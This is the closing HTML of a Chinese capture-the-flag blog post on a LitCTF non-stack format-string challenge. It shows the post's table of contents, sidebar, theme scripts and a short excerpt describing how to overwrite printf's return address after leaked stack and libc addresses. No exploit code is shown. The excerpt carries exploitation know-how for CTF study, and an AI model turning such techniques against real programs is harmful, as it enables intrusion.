href="#%E6%96%B0%E6%89%8B%E6%B3%95-%E5%88%A9%E7%94%A8%E5%8C%85%E5%90%AB-%E7%AC%A6%E5%92%8C%E9%9D%9E-%E7%AC%A6%E7%9A%84%E8%A7%A3%E6%9E%90%E9%80%9F%E5%BA%A6%E5%B7%AE%E5%BC%82%E4%B8%80%E6%AC%A1%E6%80%A7%E4%BF%AE%E6%94%B9%E4%B8%89%E8%81%94%E6%A0%88%E9%93%BE%E5%92%8C%E4%BA%8C%E8%81%94%E6%A0%88%E9%93%BE"><span class="toc-number">1.2.2.</span> <span class="toc-text">新手法:利用包含$符和非$符的解析速度差异一次性修改三联栈链和二联栈链</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E7%AC%AC%E4%B8%80%E6%9E%9A%E6%94%BB%E5%87%BB%E8%BD%BD%E8%8D%B7"><span class="toc-number">1.2.3.</span> <span class="toc-text">第一枚攻击载荷</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%90%8E%E7%BB%AD%E5%88%A9%E7%94%A8"><span class="toc-number">1.2.4.</span> <span class="toc-text">后续利用</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#EXP"><span class="toc-number">1.3.</span> <span class="toc-text">EXP</span></a></li></ol></li></ol>
      
  </div>
</div>
</div>
        <div class="sidebar-common-sidebar hidden"><div class="sidebar-author">
  <img data-src="/avatar/avatar.webp" data-sizes="auto" alt="zer00ne" class="lazyload">
  <div class="sidebar-author-name">zer00ne</div>
  <div class="sidebar-description"></div>
</div>
<div class="sidebar-state">
  <div class="sidebar-state-article">
    <div>文章</div>
    <div class="sidebar-state-number">15</div>
  </div>
  <div class="sidebar-state-category">
    <div>分类</div>
    <div class="sidebar-state-number">0</div>
  </div>
  <div class="sidebar-state-tag">
    <div>标签</div>
    <div class="sidebar-state-number">6</div>
  </div>
</div>
<div class="sidebar-social">
  
</div>
<div class="sidebar-menu">
  
    
      <div class="sidebar-menu-link-wrap">
        <a class="sidebar-menu-link-dummy" href="/" aria-label="首页"></a>
        <div class="sidebar-menu-icon icon rotate">
          &#xe62b;
        </div>
        <div class="sidebar-menu-link">首页</div>
      </div>
    
      <div class="sidebar-menu-link-wrap">
        <a class="sidebar-menu-link-dummy" href="/archives" aria-label="归档"></a>
        <div class="sidebar-menu-icon icon rotate">
          &#xe62b;
        </div>
        <div class="sidebar-menu-link">归档</div>
      </div>
    
      <div class="sidebar-menu-link-wrap">
        <a class="sidebar-menu-link-dummy" href="/about" aria-label="关于"></a>
        <div class="sidebar-menu-icon icon rotate">
          &#xe62b;
        </div>
        <div class="sidebar-menu-link">关于</div>
      </div>
    
      <div class="sidebar-menu-link-wrap">
        <a class="sidebar-menu-link-dummy" href="/friend" aria-label="友链"></a>
        <div class="sidebar-menu-icon icon rotate">
          &#xe62b;
        </div>
        <div class="sidebar-menu-link">友链</div>
      </div>
    
  
</div>
</div>
      
    
  </div>
  
    
      <div class="sidebar-btn-wrapper">
        <div class="sidebar-toc-btn current"></div>
        <div class="sidebar-common-btn"></div>
      </div>
    
  
</nav>

    </div>
    
    
    
    
<script src="https://npm.webcache.cn/lazysizes@5.3.2/lazysizes.min.js" integrity="sha384-3gT&#x2F;vsepWkfz&#x2F;ff7PpWNUeMzeWoH3cDhm&#x2F;A8jM7ouoAK0&#x2F;fP&#x2F;9bcHHR5kHq2nf+e" crossorigin="anonymous"></script>


<script src="https://npm.webcache.cn/clipboard@2.0.11/dist/clipboard.min.js" integrity="sha384-J08i8An&#x2F;QeARD9ExYpvphB8BsyOj3Gh2TSh1aLINKO3L0cMSH2dN3E22zFoXEi0Q" crossorigin="anonymous"></script>





<script src="/js/script.js"></script>



  
<script src="/js/aos.js"></script>

  <script>
    var aosInit = () => {
      AOS.init({
        duration: 1000,
        easing: "ease",
        once: true,
        offset: 50,
      });
    };
    if (document.readyState === 'loading') {
      document.addEventListener('DOMContentLoaded', aosInit);
    } else {
      aosInit();
    }
  </script>



<script src="/js/pjax_script.js" data-pjax></script>







  
<script src="https://npm.webcache.cn/mouse-firework@0.1.1/dist/index.umd.js" integrity="sha384-8LyaidD9GPxQQgLJO&#x2F;WRw&#x2F;O2h3BoNq&#x2F;ApI&#x2F;ecpvM6RsrCz2qP2ppBXUKihP4V&#x2F;2d" crossorigin="anonymous"></script>

  <script>
    window.firework && window.firework(JSON.parse('{"excludeElements":["a","button"],"particles":[{"shape":"circle","move":["emit"],"easing":"easeOutExpo","colors":["var(--red-1)","var(--red-2)","var(--red-3)","var(--red-4)"],"number":20,"duration":[1200,1800],"shapeOptions":{"radius":[16,32],"alpha":[0.3,0.5]}},{"shape":"circle","move":["diffuse"],"easing":"easeOutExpo","colors":["var(--red-0)"],"number":1,"duration":[1200,1800],"shapeOptions":{"radius":20,"alpha":[0.2,0.5],"lineWidth":6}}]}'))
  </script>





  <script>
    function initLive2d() {
      live2d.init("https://fastly.jsdelivr.net/gh/D-Sketon/plugin-live2d/", {themeTipsPath: ""});
    }
  </script>
  
<script src="https://fastly.jsdelivr.net/gh/D-Sketon/plugin-live2d/js/live2d-autoload.js" onload="initLive2d &amp;&amp; initLive2d()" async></script>







<div id="lazy-script">
  <div>
    
      
      
      <script data-pjax>
        window.REIMU_POST = {
          author: "zer00ne",
          title: "LitCTF",
          url: "https://khighl.github.io.git/2025/05/27/%E9%9D%9E%E6%A0%88%E4%B8%8A%E7%9A%84fmt/",
          excerpt: "",
          description: "",
          stripContent: "一次有趣的非栈上格式化字符串攻击参考:孤鸿师傅的博客 题目链接:NSS靶场 前言:litctf中出现的一道奇怪的题目,打完比赛后gets师傅告诉我这种题出现过几次,还甩给我一篇博客.结果打开一看,发现是楠哥的文章. 世界可真小 glibc的知识怎么永远学不完啊 题目分析 题目给了我们栈地址和libc地址,,并给了我们一次非栈上格式化字符串的机会,之后立马使用_exit(0)退出 由于使用的是_exit(0)我们无法使用exit_hook或FSOP 本题几乎是摆明了要让我们修改printf的返回地",
          date: "Tue May 27 2025 00:00:00 GMT+0800",
          updated: "Tue May 27 2025 18:04:15 GMT+0800",
          cover: "/images/banner.webp",
        };
      </script>
       
    
    
      
        
<script src="/js/insert_highlight.js" data-pjax></script>

        
      
    
    
      <script type="module" data-pjax>
        const PhotoSwipeLightbox = (await safeImport("https://npm.webcache.cn/photoswipe@5.4.4/dist/photoswipe-lightbox.esm.min.js", "sha384-DiL6M/gG+wmTxmCRZyD1zee6lIhawn5TGvED0FOh7fXcN9B0aZ9dexSF/N6lrZi/")).default;
        
        const pswp = () => {
          if (_$$('.article-entry a.article-gallery-item').length > 0) {
            new PhotoSwipeLightbox({
              gallery: '.article-entry',
              children: 'a.article-gallery-item',
              pswpModule: () => safeImport("https://npm.webcache.cn/photoswipe@5.4.4/dist/photoswipe.esm.min.js", "sha384-WkkO3GCmgkC3VQWpaV8DqhKJqpzpF9JoByxDmnV8+oTJ7m3DfYEWX1fu1scuS4+s")
            }).init();
          }
          if(_$$('.article-gallery a.article-gallery-item').length > 0) {
            new PhotoSwipeLightbox({
              gallery: '.article-gallery',
              children: 'a.article-gallery-item',
              pswpModule: () => safeImport("https://npm.webcache.cn/photoswipe@5.4.4/dist/photoswipe.esm.min.js", "sha384-WkkO3GCmgkC3VQWpaV8DqhKJqpzpF9JoByxDmnV8+oTJ7m3DfYEWX1fu1scuS4+s")
            }).init();
          }
          window.lightboxStatus = 'done';
          window.removeEventListener('lightbox:ready', pswp);
        }
        if(window.lightboxStatus === 'ready') {
          pswp()
        } else {
          window.addEventListener('lightbox:ready', pswp);
        }
      </script>
      
        








      
    
  </div>
</div>


  <script>
    console.log(String.raw`%c 
 ______     ______     __     __    __     __  __    
/\  == \   /\  ___\   /\ \   /\ "-./  \   /\ \/\ \   
\ \  __<   \ \  __\   \ \ \  \ \ \-./\ \  \ \ \_\ \  
 \ \_\ \_\  \ \_____\  \ \_\  \ \_\ \ \_\  \ \_____\ 
  \/_/ /_/   \/_____/   \/_/   \/_/  \/_/   \/_____/ 
                                                  
`,'color: #ff5252;')
    console.log('%c Theme.Reimu v' + '1.8.0' + ' %c https://github.com/D-Sketon/hexo-theme-reimu ', 'color: white; background: #ff5252; padding:5px 0;', 'padding:4px;border:1px solid #ff5252;')
  </script>
  



  
<script src="https://npm.webcache.cn/busuanzi@2.3.0/bsz.pure.mini.js" integrity="sha384-0M75wtSkhjIInv4coYlaJU83+OypaRCIq2SukQVQX04eGTCBXJDuWAbJet56id+S" crossorigin="anonymous" async></script>




<script>
  if ('serviceWorker' in navigator) {
    navigator.serviceWorker.getRegistrations().then((registrations) => {
      for (let registration of registrations) {
        registration.unregister();
      }
    });
  }
</script>









    
  </body>
  </html>

